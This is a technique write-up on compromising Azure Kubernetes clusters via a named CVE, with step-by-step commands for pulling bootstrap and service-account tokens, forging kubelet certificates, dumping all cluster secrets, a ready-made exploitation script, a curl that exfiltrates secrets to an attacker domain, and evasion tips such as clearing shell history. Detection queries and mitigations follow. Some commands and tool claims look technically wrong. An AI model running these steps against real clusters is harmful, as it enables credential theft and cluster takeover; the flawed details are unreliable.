| Attribute | Details |
|---|---|
| Technique ID | CONTAINER-001 |
| MITRE ATT&CK v18.1 | T1552.007 - Unsecured Credentials: Container API |
| Tactic | Credential Access / Lateral Movement |
| Platforms | Azure (AKS, Azure Container Instances) |
| Severity | Critical |
| CVE | CVE-2025-21196 |
| Technique Status | ACTIVE |
| Last Verified | 2025-02-12 |
| Affected Versions | AKS 1.25.0 - 1.28.3, ACI all instances (container images pre-Feb 2025) |
| Patched In | AKS 1.28.4+, ACI: container images rebuilt post-Feb 2025 |
| Author | SERVTEP – Artur Pchelnikau |
Concept: CVE-2025-21196 is a critical vulnerability in Microsoft Azure’s Kubernetes orchestration layer affecting Azure Kubernetes Service (AKS) and Azure Container Instances (ACI). The vulnerability stems from misconfigured access controls within the container orchestration layer that bypass authentication mechanisms, allowing unauthorized access to containerized workloads. An attacker with pod execution privileges can exploit undocumented endpoints (WireServer, HostGAPlugin) on AKS nodes to retrieve TLS bootstrap tokens, perform TLS bootstrap attacks, and gain full API server access without requiring host network privileges or root access. The attack chain mirrors the 2018 Google Kubernetes Engine (GKE) bootstrap token vulnerability.
Attack Surface: Azure AKS node configuration endpoints, Kubernetes API server RBAC enforcement, service account token management, and the etcd backend storing cluster secrets.
Business Impact: Complete cluster compromise including data exfiltration, ransomware deployment, and service disruption. Organizations using AKS to run containerized workloads face immediate risk of credential theft, arbitrary code execution, access to all cluster secrets across namespaces, and potential financial/reputational damage through regulatory violations (GDPR, HIPAA, CCPA).
Technical Context: Exploitation typically requires initial pod execution access (obtained through application vulnerabilities, misconfigurations, or lateral movement). Once achieved, token extraction is rapid (seconds) and leaves minimal forensic traces if audit logging is misconfigured. Detection likelihood is medium-to-low if API audit logs are not properly configured, but forensic recovery is straightforward via audit log analysis.
| Framework | Control / ID | Description |
|---|---|---|
| CIS Kubernetes Benchmark | 4.1.1-4.1.2 | RBAC enforcement and service account token management failures |
| DISA STIG | V-242376 | Kubernetes API server must enforce authentication for all requests |
| CISA SCuBA | AC-2 | Account and access management controls in cloud containers |
| NIST 800-53 | AC-2, AC-3, SI-4 | Account management, access enforcement, system monitoring |
| GDPR | Article 32 | Security of processing; cryptographic controls failure |
| DORA | Article 9 | Protection and prevention of ICT-related incidents |
| NIS2 | Article 21 | Cyber risk management measures (critical infrastructure) |
| ISO 27001 | A.9.2.3, A.9.4.3 | Management of privileged access; cryptographic key management |
| ISO 27005 | Section 8 | Information security risk assessment; token compromise risk scenario |
Supported Versions:
Required Tools:
- curl or wget (for metadata endpoint access)
- kubectl (for API server interaction)
- openssl (for certificate inspection and CSR generation)
Command (Linux/Bash):
# Check if running inside a pod
if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ]; then
echo "Running in Kubernetes pod"
KUBE_TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
KUBE_CA=$(cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt)
KUBE_API_SERVER="https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT"
echo "API Server: $KUBE_API_SERVER"
fi
# Check Azure WireServer endpoint accessibility
curl -s -H "Metadata:true" "http://169.254.169.254/metadata/instance?api-version=2017-12-01" | jq . | head -20
What to Look For:
- vmScaleSetName or vmName indicates node details
Command (If pod has host network namespace):
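Captured metadata can be triaged offline; a minimal sketch, assuming jq is available (the sample JSON below stands in for a live IMDS response):

```shell
# Sample IMDS-style document standing in for the live 169.254.169.254 response
imds='{"compute":{"vmScaleSetName":"aks-nodepool1-12345678-vmss","vmId":"123e4567-e89b-12d3-a456-426614174000","location":"eastus"}}'

# A vmScaleSetName matching aks-* confirms the pod sits on an AKS VMSS node
printf '%s' "$imds" | jq -r '.compute.vmScaleSetName'
```

The same pattern applies to any field of interest (vmId, location, tags) without re-querying the endpoint.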
# Check if pod is running with host network
ip route | grep default
netstat -tlnp | grep 10250 # Kubelet port
What to Look For:
Supported Versions: AKS 1.25.0 - 1.28.3
Objective: Confirm execution context and determine available permissions
Command:
kubectl auth can-i get secrets --as=system:serviceaccount:$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace):default
Expected Output:
yes
What This Means:
OpSec & Evasion:
- Clear shell history with history -c after execution
- Execute via variable indirection (eval $COMMAND) to avoid obvious command lines
Objective: Retrieve encrypted node provisioning configuration containing TLS bootstrap token
Command:
# From within the pod or if host network is accessible
WIRESERVER_IP="168.63.129.16" # Azure WireServer fixed IP
curl -s -X GET "http://${WIRESERVER_IP}/metadata/instance/compute?api-version=2017-12-01" \
-H "Metadata:true" | jq '.vmScaleSetName, .vmId, .location'
# Query HostGAPlugin for encrypted settings (requires specific permissions)
curl -s -X POST "http://${WIRESERVER_IP}/machine/?comp=guestConfigurationRequest" \
-H "Content-Type: application/json" \
-d '{"httpRequest": {"requestUri": "/wireserver/fetch-config"}}' | base64 -d 2>/dev/null
Expected Output:
{
"compute": {
"vmScaleSetName": "aks-nodepool1-12345678-vmss",
"vmId": "123e4567-e89b-12d3-a456-426614174000",
"location": "eastus"
}
}
What This Means:
OpSec & Evasion:
- Add -A "Mozilla/5.0" to curl requests to blend in
Objective: Retrieve plaintext bootstrap token from CSE (Custom Script Extension) data
Command:
# Requires compromised node shell access or WireServer exploitation
# This would typically be in the CSE provisioning script
ssh -i <node_key> azureuser@<node_ip> "cat /var/lib/waagent/*/HandlerState" 2>/dev/null || \
echo "Attempting alternative extraction from /proc or environment..."
# If pod has access to node filesystem (rare mount scenario)
cat /host/var/lib/waagent/*/status/* 2>/dev/null | grep -oP "TLS_BOOTSTRAP_TOKEN[\"']?\s*[:=]\s*[\"']?\K[^\"']*"
# Or retrieve from WireServer encrypted blob and decrypt
curl -s "http://168.63.129.16/machine/?comp=guestConfigurationRequest" \
-H "Content-Type: application/json" | \
python3 -c "import sys, base64, json; data=json.load(sys.stdin); \
print(base64.b64decode(data['protectedSettings']).decode())" 2>/dev/null
Expected Output:
TLS_BOOTSTRAP_TOKEN=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
What This Means:
- Decode the token at jwt.io or locally to confirm its claims
OpSec & Evasion:
Troubleshooting:
Objective: Authenticate to Kubernetes API and request node certificate
Command:
# Decode bootstrap token
BOOTSTRAP_TOKEN="<extracted_token_from_step3>"
# Create CSR for a new node (kubelet certificate)
openssl req -new -newkey rsa:2048 -keyout kubelet.key -out kubelet.csr \
-subj "/CN=system:node:compromised-node/O=system:nodes"
# Submit CSR to Kubernetes API using bootstrap token
KUBE_API="https://<aks-cluster-name>.<region>.azmk8s.io"
curl -s -X POST "$KUBE_API/apis/certificates.k8s.io/v1/certificatesigningrequests" \
-H "Authorization: Bearer $BOOTSTRAP_TOKEN" \
-H "Content-Type: application/json" \
-d @- << EOF  # unquoted delimiter so the embedded $(...) base64 expands
{
"apiVersion": "certificates.k8s.io/v1",
"kind": "CertificateSigningRequest",
"metadata": {
"name": "compromised-kubelet-cert"
},
"spec": {
"request": "$(cat kubelet.csr | base64 -w0)",
"signerName": "kubernetes.io/kubelet-serving",
"usages": ["digital signature", "key encipherment", "server auth"]
}
}
EOF
# The API server auto-approves CSRs from bootstrap token
# Retrieve the signed certificate
curl -s -X GET "$KUBE_API/apis/certificates.k8s.io/v1/certificatesigningrequests/compromised-kubelet-cert" \
-H "Authorization: Bearer $BOOTSTRAP_TOKEN" | jq '.status.certificate' -r | base64 -d > kubelet.crt
Expected Output:
-----BEGIN CERTIFICATE-----
MIIDazCCAlOgAwIBAgIUfkQiJsHqN8...
-----END CERTIFICATE-----
What This Means:
OpSec & Evasion:
Objective: Use obtained certificate to access Kubernetes API and dump all secrets
Command:
# Use kubelet certificate to authenticate
KUBE_API="https://<aks-cluster-name>.<region>.azmk8s.io"
# List all secrets in all namespaces
curl -s -X GET "$KUBE_API/api/v1/secrets" \
--cert kubelet.crt --key kubelet.key \
--cacert ca.crt | jq '.items[] | {namespace: .metadata.namespace, name: .metadata.name, data: .data}'
# Extract specific secret (e.g., database credentials)
curl -s -X GET "$KUBE_API/api/v1/namespaces/production/secrets/db-credentials" \
--cert kubelet.crt --key kubelet.key \
--cacert ca.crt | jq '.data | to_entries[] | {key: .key, value: (.value | @base64d)}'
# Exfiltrate to attacker-controlled endpoint
curl -s -X GET "$KUBE_API/api/v1/namespaces/production/secrets/db-credentials" \
--cert kubelet.crt --key kubelet.key --cacert ca.crt | \
curl -X POST "https://attacker-domain.com/collect" \
-d @- --silent --output /dev/null
Expected Output:
{
"database_username": "prod_user",
"database_password": "SuperSecret123!",
"connection_string": "postgresql://prod_user:SuperSecret123!@db.internal:5432/prod_db"
}
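The base64-encoded data map of any secret object can be decoded in one pass; a sketch assuming jq 1.6+ for @base64d (the sample document below is illustrative):

```shell
# decode_secret: turn a Kubernetes secret JSON document into key=value pairs,
# base64-decoding each data entry (@base64d requires jq 1.6+)
decode_secret() {
  jq -r '.data | to_entries[] | "\(.key)=\(.value|@base64d)"'
}

# Illustrative secret document (value is base64 of "prod_user")
echo '{"data":{"database_username":"cHJvZF91c2Vy"}}' | decode_secret
```

Pipe any `/api/v1/namespaces/{ns}/secrets/{name}` response through the function to get plaintext credentials directly.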
What This Means:
OpSec & Evasion:
Supported Versions: AKS 1.25.0 - 1.28.3 (specifically vulnerable to host namespace exposure)
Objective: Determine if pod has access to host processes
Command:
# Check if pod is running with hostNetwork: true
# Heuristic: on a hostNetwork pod, node-only listeners such as the kubelet port are visible
ss -tlnp 2>/dev/null | grep -q ':10250' && echo "Host network shared!" || echo "Container network"
# Alternative: inspect the network namespace inode directly
readlink /proc/self/ns/net
# If host network is shared, query the kubelet API on the node directly
# (the kubelet serves /pods; /api/v1/nodes is an API server path, not a kubelet one)
curl -sk https://localhost:10250/pods | jq -r '.items[] | .metadata.namespace + "/" + .metadata.name'
Expected Output (if vulnerable):
Host network shared!
kube-system/kube-proxy-x7k2p
kube-system/azure-ip-masq-agent-9qj4w
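A slightly more robust check compares namespace inodes directly instead of grepping for listeners; a sketch using standard Linux procfs paths:

```shell
# same_netns: true if two PIDs share one network namespace
# (procfs exposes the namespace as a symlink whose target encodes the inode)
same_netns() {
  [ "$(readlink /proc/"$1"/ns/net)" = "$(readlink /proc/"$2"/ns/net)" ]
}

# Compare this shell's netns with PID 1's
same_netns 1 $$ && echo "sharing PID 1's network namespace" || echo "isolated network namespace"
```

Reading /proc/1/ns/net may require matching privileges; an empty readlink result should be treated as inconclusive rather than as isolation.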
What This Means:
Objective: Retrieve long-lived kubelet authentication token
Command:
# If pod has volumeMount to host filesystem (rare)
cat /host/var/lib/kubelet/kubeconfig 2>/dev/null | grep token | awk '{print $2}' | xargs -I {} echo "Kubelet token: {}"
# If host network but no filesystem mount, use proc to read kubelet process memory
strings /proc/$(pgrep -f "kubelet.*" | head -1)/environ 2>/dev/null | grep -i "kubeconfig\|token"
# Alternative: Read certificate directly
cat /host/var/lib/kubelet/pki/kubelet-client-current.pem 2>/dev/null
Expected Output:
Kubelet token: eyJhbGciOiJSUzI1NiIsImtpZCI6IkJWM1...
What This Means:
Objective: Use exfiltrated credentials from remote attacker infrastructure
Command (On Attacker’s Kali/Parrot Machine):
# Create kubeconfig from stolen credentials
cat > ~/.kube/config << 'EOF'
apiVersion: v1
clusters:
- cluster:
insecure-skip-tls-verify: true
server: https://<aks-cluster-name>.<region>.azmk8s.io
name: aks-cluster
contexts:
- context:
cluster: aks-cluster
user: kubelet
name: default
current-context: default
kind: Config
preferences: {}
users:
- name: kubelet
user:
token: <KUBELET_TOKEN>
EOF
# Enumerate cluster resources
kubectl get nodes
kubectl get secrets --all-namespaces
kubectl get pods --all-namespaces
Expected Output:
NAME STATUS ROLES AGE VERSION
aks-nodepool1-12345678-000000 Ready agent 30d v1.28.2
aks-nodepool1-12345678-000001 Ready agent 30d v1.28.2
NAMESPACE NAME TYPE DATA
kube-system bootstrap-token-abcd1 bootstrap.token 6
production db-credentials Opaque 3
default default-token-xyz kubernetes.io/service-account-token 3
What This Means:
Supported Versions: AKS 1.25.0 - 1.28.3 (all versions with default token mounting)
Objective: Read mounted token from pod’s service account
Command:
# Default location inside any pod
cat /var/run/secrets/kubernetes.io/serviceaccount/token
# Store for exfiltration
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
echo $TOKEN
Expected Output:
eyJhbGciOiJSUzI1NiIsImtpZCI6IlBYVkRLVjBCOE1...
What This Means:
Objective: Determine what the stolen token can do
Command:
# Decode JWT (online via jwt.io or locally)
echo $TOKEN | cut -d'.' -f2 | base64 -d | jq '.'
# Test token permissions
KUBE_API="https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT"
CA_CERT="/var/run/secrets/kubernetes.io/serviceaccount/ca.crt"
curl -s -X GET "$KUBE_API/api/v1/namespaces" \
--cacert $CA_CERT \
-H "Authorization: Bearer $TOKEN" | jq '.items[].metadata.name'
Expected Output:
{
"iss": "https://aks-cluster.azmk8s.io",
"sub": "system:serviceaccount:default:default",
"aud": ["https://kubernetes.default.svc.cluster.local"]
}
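Note that plain base64 -d chokes when the claims segment's length is not a multiple of 4 — JWTs use unpadded base64url. A padding-aware helper, as a sketch:

```shell
# jwt_payload: extract and decode the claims segment of a JWT,
# mapping base64url characters to base64 and restoring stripped padding
jwt_payload() {
  local seg
  seg=$(printf '%s' "$1" | cut -d'.' -f2 | tr '_-' '/+')
  while [ $(( ${#seg} % 4 )) -ne 0 ]; do seg="${seg}="; done
  printf '%s' "$seg" | base64 -d
}

# Usage: jwt_payload "$TOKEN" | jq '.'
```

This avoids the intermittent "invalid input" failures of the one-liner above on tokens whose payload happens to need padding.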
Objective: Use token to access other services or namespaces
Command:
# List accessible secrets
curl -s -X GET "$KUBE_API/api/v1/secrets" \
--cacert $CA_CERT \
-H "Authorization: Bearer $TOKEN" | jq '.items[] | {name: .metadata.name, namespace: .metadata.namespace}'
# Access production namespace secrets if default SA has permissions
curl -s -X GET "$KUBE_API/api/v1/namespaces/production/secrets" \
--cacert $CA_CERT \
-H "Authorization: Bearer $TOKEN" | jq '.items[].data'
OpSec & Evasion:
Tool: kubectl. Version: 1.25.0+. Minimum Version: 1.24.0. Supported Platforms: Linux, macOS, Windows.
Installation:
# Linux
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
chmod +x kubectl && sudo mv kubectl /usr/local/bin/
# macOS (Homebrew)
brew install kubernetes-cli
# Verify
kubectl version --client
Version-Specific Notes:
Usage:
# Export kubeconfig
export KUBECONFIG=~/.kube/config
# List all secrets
kubectl get secrets --all-namespaces
# Decode secret
kubectl get secret <name> -n <namespace> -o json | jq -r '.data.database_password | @base64d'
Tool: curl. Version: 7.80.0+. Minimum Version: 7.0.0. Supported Platforms: All.
Installation:
# Linux (Debian/Ubuntu)
sudo apt-get install curl
# Fedora/RHEL
sudo dnf install curl
# macOS
brew install curl
Usage for Kubernetes API:
curl -s -X GET "https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT/api/v1/secrets" \
--cacert /var/run/secrets/kubernetes.io/serviceaccount/ca.crt \
-H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)"
Tool: openssl. Version: 1.1.1+. Minimum Version: 1.0.2. Supported Platforms: All.
Installation:
# Linux
sudo apt-get install openssl
# macOS
brew install openssl
# Verify
openssl version
Usage for CSR Generation:
# Generate key and CSR
openssl req -new -newkey rsa:2048 -keyout node.key -out node.csr \
-subj "/CN=system:node:aks-node/O=system:nodes"
# Inspect certificate
openssl x509 -in certificate.pem -text -noout
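Before submitting a CSR it is worth confirming the subject encodes the node identity exactly, since the kubelet-serving signer path expects the system:nodes group and a system:node: CN. A sketch (filenames are illustrative):

```shell
# Generate a throwaway RSA key and CSR carrying a node identity
# (-nodes leaves the key unencrypted so no passphrase prompt blocks automation)
openssl req -new -newkey rsa:2048 -nodes -keyout node.key -out node.csr \
  -subj "/CN=system:node:aks-node/O=system:nodes" 2>/dev/null

# Inspect the subject before submission
openssl req -in node.csr -noout -subject
```

A CN or O that deviates from this convention produces a CSR the signer will not auto-approve, so verifying locally saves a detectable failed API round trip.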
#!/bin/bash
# CONTAINER-001 exploitation chain (single script)
echo "[+] Extracting service account token..."
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CA=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
API_SERVER="https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT"
echo "[+] Listing all namespaces..."
curl -s "$API_SERVER/api/v1/namespaces" --cacert $CA \
-H "Authorization: Bearer $TOKEN" | jq '.items[] | .metadata.name'
echo "[+] Extracting secrets from all namespaces..."
for ns in $(curl -s "$API_SERVER/api/v1/namespaces" --cacert $CA \
-H "Authorization: Bearer $TOKEN" | jq -r '.items[].metadata.name'); do
echo "[*] Namespace: $ns"
curl -s "$API_SERVER/api/v1/namespaces/$ns/secrets" --cacert $CA \
-H "Authorization: Bearer $TOKEN" | jq -r '.items[].data | to_entries[]? | "\(.key)=\(.value|@base64d)"' 2>/dev/null
done
echo "[+] Done. Exfiltrate token: $TOKEN"
Endpoint: http://169.254.169.254/metadata/instance
Purpose: Returns node and VM scale set metadata
Authentication: Header Metadata:true required
Usage:
curl -s -H "Metadata:true" "http://169.254.169.254/metadata/instance?api-version=2017-12-01"
What Information is Leaked:
| Endpoint | Method | Purpose |
|---|---|---|
| /api/v1/secrets | GET | List all secrets in all namespaces |
| /api/v1/namespaces/{ns}/secrets | GET | List secrets in specific namespace |
| /api/v1/namespaces/{ns}/secrets/{name} | GET | Read specific secret |
| /apis/certificates.k8s.io/v1/certificatesigningrequests | POST | Submit certificate signing request |
| /api/v1/nodes | GET | List cluster nodes |
| /api/v1/serviceaccounts | GET | List service accounts |
Rule Configuration:
KQL Query:
AzureDiagnostics
| where ResourceProvider == "MICROSOFT.CONTAINERSERVICE"
and Category == "kube-audit"
and properties.verb == "create"
and properties.objectRef.resource == "certificatesigningrequests"
and (properties.user.username startswith "system:serviceaccount:" or
properties.user.username == "system:anonymous")
| extend principalId = tostring(properties.principalId),
userName = tostring(properties.user.username),
CSRName = tostring(properties.objectRef.name)
| summarize CSRCount = count(),
UniqueUsers = dcount(userName),
UniqueCSRs = dcount(CSRName)
by principalId, bin(TimeGenerated, 10m)
| where CSRCount > 2
| project TimeGenerated, principalId, CSRCount, UniqueUsers, UniqueCSRs
What This Detects:
Manual Configuration Steps (Azure Portal):
Alert Name: Suspicious Kubernetes CSR Requests
Severity: High
Query Frequency: 10 minutes
Query Period: 30 minutes
Rule Configuration:
KQL Query:
AzureDiagnostics
| where ResourceProvider == "MICROSOFT.CONTAINERSERVICE"
and Category == "kube-audit"
and properties.verb in ("list", "get")
and properties.objectRef.resource == "serviceaccounttokens"
and properties.requestStatus == "Success"
| extend user = tostring(properties.user.username),
sourceIP = tostring(properties.sourceIPs[0]),
namespace = tostring(properties.objectRef.namespace)
| summarize TokenAccessCount = count(),
UniqueNamespaces = dcount(namespace),
FailedAttempts = countif(properties.requestStatus == "Failure")
by user, sourceIP, bin(TimeGenerated, 5m)
| where TokenAccessCount > 5 or UniqueNamespaces > 3
| project TimeGenerated, user, sourceIP, TokenAccessCount, UniqueNamespaces, FailedAttempts
Note: Kubernetes API Server audit logs are stored in Azure Activity Log (not Windows Event Viewer). However, if Azure Monitor Agent is deployed on nodes, collect the following:
Event ID: 4688 (Process Creation)
Filter: Image contains "kubectl" OR Image contains "curl" OR Image contains "openssl"
Manual Configuration Steps (Group Policy - Deployed to AKS Nodes via DaemonSet):
Minimum Sysmon Version: 13.0+ Supported Platforms: Linux (via osquery if Sysmon is not available)
Sysmon Configuration (XML):
<Sysmon schemaversion="4.80">
<EventFiltering>
<!-- Monitor for certificate operations -->
<RuleGroup name="Kubernetes" groupRelation="or">
<FileCreate onmatch="include">
<TargetFilename condition="contains">/var/lib/kubelet/kubeconfig</TargetFilename>
<TargetFilename condition="contains">kubelet.csr</TargetFilename>
<TargetFilename condition="contains">kubelet.crt</TargetFilename>
</FileCreate>
<!-- Monitor network connections to API server -->
<NetworkConnect onmatch="include">
<DestinationPort condition="is">6443</DestinationPort>
<DestinationPort condition="is">10250</DestinationPort>
<Image condition="contains">curl</Image>
<Image condition="contains">kubectl</Image>
</NetworkConnect>
<!-- Monitor for credential dumping tools -->
<ProcessCreate onmatch="include">
<CommandLine condition="contains">openssl</CommandLine>
<CommandLine condition="contains">jwt</CommandLine>
<CommandLine condition="contains">base64</CommandLine>
</ProcessCreate>
</RuleGroup>
</EventFiltering>
</Sysmon>
Manual Configuration Steps:
- Save the configuration as sysmon-k8s.xml with the above content
Alert Name: Suspicious Kubernetes API Server Activity
Manual Configuration Steps (Enable Defender for Cloud):
Reference: Microsoft Defender for Cloud Kubernetes Alerts
# Connect to your Azure tenant
Connect-AzAccount
# Search for suspicious service account token access
Search-UnifiedAuditLog -StartDate (Get-Date).AddDays(-7) `
-EndDate (Get-Date) `
-Operations "AKS_API_Call", "Certificate_Signed", "Secret_Accessed" `
-FreeText "serviceaccount" | Select-Object UserIds, Operation, AuditData | Export-Csv audit_results.csv
Manual Configuration Steps (Microsoft Purview Compliance Portal):
Disable Anonymous API Access: Prevent unauthenticated requests to Kubernetes API
Applies To Versions: AKS 1.25.0+
Manual Steps (Azure Portal):
- Add 0.0.0.0/0 to the Deny list (or explicitly allow IP ranges)
Manual Steps (Azure CLI):
az aks update --name myCluster --resource-group myRG \
--api-server-authorized-ip-ranges 10.0.0.0/8,192.168.0.0/16
Validation Command:
curl -s -o /dev/null -w '%{http_code}' "https://<aks-cluster>.azmk8s.io/api/v1" | grep -qE "401|403" && echo "PROTECTED" || echo "VULNERABLE"
Enable Kubernetes RBAC and Audit Logging: Ensure all API calls are logged and access is restricted
Applies To Versions: AKS 1.25.0+
Manual Steps (Azure Portal):
Manual Steps (Azure CLI):
az aks update --name myCluster --resource-group myRG \
--enable-managed-identity \
--enable-aad
Implement Network Policies: Isolate pod-to-pod communication to prevent lateral movement
Applies To Versions: AKS 1.25.0+
Manual Steps:
kubectl apply -f https://raw.githubusercontent.com/projectcalico/calico/v3.24.0/manifests/tigera-operator.yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: default-deny
namespace: default
spec:
podSelector: {}
policyTypes:
- Ingress
- Egress
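A default-deny policy also blocks DNS, which breaks most workloads. Pair it with a narrowly scoped egress allowance — a sketch, noting that the kube-dns label selectors below are upstream defaults and may differ per cluster:

```shell
kubectl apply -f - << 'EOF'
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-dns-egress
  namespace: default
spec:
  podSelector: {}
  policyTypes:
    - Egress
  egress:
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: kube-system
          podSelector:
            matchLabels:
              k8s-app: kube-dns
      ports:
        - protocol: UDP
          port: 53
        - protocol: TCP
          port: 53
EOF
```

Scoping egress to kube-dns only keeps lateral movement blocked while restoring name resolution.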
Use Short-Lived Service Account Tokens: Implement token expiration
Applies To Versions: AKS 1.29.0+
Manual Steps (Kubernetes 1.29+):
kubectl patch serviceaccount default -p '{"automountServiceAccountToken": false}'
# For applications that need tokens, use projected volumes with expiration
kubectl apply -f - << 'EOF'
apiVersion: v1
kind: Pod
metadata:
name: app-pod
spec:
serviceAccountName: app
containers:
- name: app
image: myapp:latest
volumeMounts:
- name: sa-token
mountPath: /var/run/secrets/tokens
volumes:
- name: sa-token
projected:
sources:
- serviceAccountToken:
audience: api
expirationSeconds: 3600
path: token
EOF
kubectl get rolebindings --all-namespaces -o wide
kubectl get clusterrolebindings -o wide
kubectl delete clusterrolebinding system:default-cluster-admin
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
namespace: default
name: pod-reader
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["get", "list"]
Restrict AKS API Access
# Check if default service account has cluster-admin
kubectl get clusterrolebinding -o wide | grep "system:default"
# Expected output: NONE (empty)
# If you see cluster-admin binding, it's over-permissive
Manual Steps (Azure CLI):
az aks update --name myCluster --resource-group myRG \
--enable-disk-encryption \
--encryption-at-host
- /var/lib/kubelet/kubeconfig (kubelet configuration with tokens)
- /var/lib/kubelet/pki/kubelet-client-current.pem (kubelet client certificate)
- kubelet.key, kubelet.csr, kubelet.crt (locally generated certificates)
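The filesystem artifacts above can be swept quickly during triage; a read-only sketch for Linux nodes (GNU stat assumed):

```shell
# triage_paths: report which CONTAINER-001 artifacts exist, with their mtimes
triage_paths() {
  local f
  for f in "$@"; do
    [ -e "$f" ] && printf 'FOUND %s (mtime %s)\n' "$f" "$(stat -c %y "$f")"
  done
  return 0
}

triage_paths /var/lib/kubelet/kubeconfig \
             /var/lib/kubelet/pki/kubelet-client-current.pem \
             kubelet.key kubelet.csr kubelet.crt
```

Recent mtimes on kubelet.csr or kubelet.crt outside normal certificate rotation windows are a strong indicator of the TLS bootstrap attack described above.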
Registry: Not applicable (Kubernetes stores configurations in etcd, not Windows Registry)
- *.azmk8s.io (AKS API endpoint)
- 168.63.129.16:80 (Azure WireServer)
- Outbound connections to *.azmk8s.io from unexpected sources
- Audit events matching properties.verb == "create" AND properties.objectRef.resource == "certificatesigningrequests"
Retention: 90 days default
- /var/log/containers/* on AKS nodes
What to look for: Unusual API calls, token enumeration, secret access
Query: Operations on AKS cluster (updates, role assignments, diagnostics changes)
# Immediately disable the compromised node pool
az aks nodepool update --cluster-name myCluster --name nodepool1 \
--resource-group myRG --mode System --disable-cluster-autoscale
# Cordon the nodes to prevent new pod scheduling
kubectl cordon -l agentpool=nodepool1
Manual (Azure Portal):
# Export Kubernetes audit logs
az monitor log-analytics query \
--workspace <workspace-id> \
--analytics-query "AzureDiagnostics | where ResourceProvider == 'MICROSOFT.CONTAINERSERVICE' | where TimeGenerated > ago(7d)"
# Export node logs
for node in $(kubectl get nodes -o name); do
kubectl debug $node -it --image=ubuntu -- \
tar czf /tmp/node-logs.tar.gz /var/log/
done
Manual (Azure Portal):
# Revoke all service account tokens by recreating secrets
kubectl delete secret -n kube-system bootstrap-token-abcd1 || true
# Rotate AKS cluster credentials
az aks rotate-certs --resource-group myRG --name myCluster
# Delete any compromised pods
kubectl delete pod <compromised-pod-name> -n <namespace>
# Restart kubelet to clear cached tokens
systemctl restart kubelet
Long-Term Remediation:
| Step | Phase | Technique | Description |
|---|---|---|---|
| 1 | Initial Access | [IA-EXPLOIT-004] Kubelet API Unauthorized Access | Attacker discovers exposed kubelet port without authentication |
| 2 | Privilege Escalation | [PE-EXPLOIT-004] Container Escape to Host | Attacker escapes container and gains host access |
| 3 | Credential Access | [CONTAINER-001] Kubernetes API Server Compromise | Attacker extracts bootstrap tokens and obtains cluster API access |
| 4 | Credential Access | [CONTAINER-002] Container Orchestration Secret Theft | Attacker lists and exfiltrates all cluster secrets |
| 5 | Lateral Movement | [LM-AUTH-030] AKS Service Account Token Theft | Attacker uses stolen tokens for remote cluster access |
| 6 | Impact | Data exfiltration, ransomware deployment, cluster takeover | Attacker achieves full control of containerized workloads |